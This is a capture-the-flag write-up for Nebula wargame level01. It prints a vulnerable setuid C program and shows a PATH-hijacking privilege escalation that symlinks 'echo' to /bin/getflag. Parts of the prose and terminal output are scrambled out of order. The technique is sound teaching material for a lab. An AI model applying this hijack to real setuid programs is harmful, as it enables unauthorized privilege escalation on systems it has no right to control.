In
level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is provided:
First we prepend /home/level01 to $PATH
The system() library call executes echo "and now what?"#include <stdlib.h>#include <unistd.h>#include <string.h>#include <sys/types.h>#include <stdio.h>
int main ( int argc , char ** argv , char ** envp ){gid_t gid ;uid_t uid ;gid = getegid ();uid = geteuid ();
setresgid ( gid , gid , gid );setresuid ( uid , uid , uid );
system("/usr/bin/env echo and now what?");}
level01@nebula:~$ ../flag01/flag01but instead of directly running /bin/echo, it uses /usr/bin/env to find the location of echo. Ever came across scripts starting with #!/usr/bin/env python ? This is used for portability issues, as fixing a path (such as /usr/bin/python) wouldn't work when the Python interpreter is installed in a different location. How does env look for the specified program ? it simply searches in the directories specified in the PATH environment variable starting from the the first directory, and going through the directories in $PATH until it finds the looked-for program.
and now what?
level01@nebula:~$ echo $PATHHow to attack this program ? We will prepend to $PATH a directory in which we will add a symbolic link echo pointing to /bin/getflag.
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
First we prepend /home/level01 to $PATH
level01@nebula:~$ export PATH=/home/level01/:$PATH
level01@nebula:~$ echo $PATHNow we create a symbolic link /home/level01/echo to /bin/getflag
/home/level01/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ ls -l echoNow flag01 will run our own /home/level01/echo that is simply a symbolic link to /bin/getflag.
lrwxrwxrwx 1 level01 level01 12 2012-10-28 12:32 echo -> /bin/getflag
level01@nebula:~$ ../flag01/flag01
You have successfully executed getflag on a target account